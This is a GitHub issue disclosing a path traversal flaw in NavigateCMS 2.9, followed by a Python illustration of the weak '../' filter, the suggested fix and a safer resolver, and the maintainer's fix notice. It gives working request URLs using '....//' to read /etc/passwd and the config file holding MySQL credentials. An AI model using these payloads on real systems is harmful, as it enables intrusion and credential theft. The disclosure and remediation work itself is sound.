NavigateCMS / Navigate-CMS

Navigate CMS, a very powerful open source content management system for everybody.
http://www.navigatecms.com
GNU General Public License v2.0

arbitrary file read vulnerability in NavigateCMS 2.9 #28

Closed bkfish closed 2 years ago

bkfish commented 2 years ago

exp

After login, we can see our sid in the cookies (screenshot). For example, my sid is 161099c65675803ecc8de95ae08d3e12. Then you can get an arbitrary file by /navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd (screenshot). With /navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php you can get some sensitive information such as the MySQL user/password.

analysis

Location: navigate_download.php (screenshot) and, in navigate\lib\core\core.php (screenshot), the filter we can bypass.

suggest

You can use replace('../', "hacker") rather than replace('../', "").
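The filter defect described in this report, re-created as an added Python example (not NavigateCMS code, which is PHP): the single-pass strip of '../', the sentinel replacement suggested above, and a validate-instead-of-sanitize resolver that anchors the id under a fixed root. DOWNLOAD_ROOT and the sample ids are constructed for the example.

```python
import posixpath

# Root the download handler is allowed to serve from (constructed for this example).
DOWNLOAD_ROOT = "/var/www/navigate/private"


def weak_filter(path_id: str) -> str:
    """Single-pass strip of '../', the pattern the report shows being bypassed.

    replace() runs once, so the two outer dots and the trailing slash of
    '....//' recombine into '../' after the inner '../' is removed.
    """
    return path_id.replace("../", "")


def sentinel_filter(path_id: str) -> str:
    """The reporter's suggestion: substitute a token that cannot recombine
    into '../', so whatever remains is an inert (if odd-looking) name."""
    return path_id.replace("../", "hacker")


def safe_resolve(path_id: str, root: str = DOWNLOAD_ROOT):
    """Validate instead of sanitize: anchor the id under root, normalise the
    path lexically, and refuse anything that does not land strictly inside.
    Returns the canonical path, or None when the id must be rejected."""
    if "\x00" in path_id:  # NUL bytes truncate paths in C-backed file APIs
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, path_id.lstrip("/")))
    if not candidate.startswith(root + "/"):  # also rejects root itself
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample ids: a legitimate file, the bypass form from the
    # report, and a plain traversal.
    for sample in ("reports/summary.pdf", "....//....//cfg/globals.php", "../../etc/passwd"):
        print(f"{sample!r:32} weak={weak_filter(sample)!r:24} "
              f"sentinel={sentinel_filter(sample)!r:36} safe={safe_resolve(sample)!r}")
```

Note that safe_resolve accepts the '....//' id unchanged: once it is anchored under the root it is just a nonexistent subdirectory name, which is the behaviour you want from validation rather than string surgery.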

NavigateCMS commented 2 years ago

Fixed by fabb4718d7c6a4e0bdf02800d55d7de2cf492261

Thank you very much bkfish!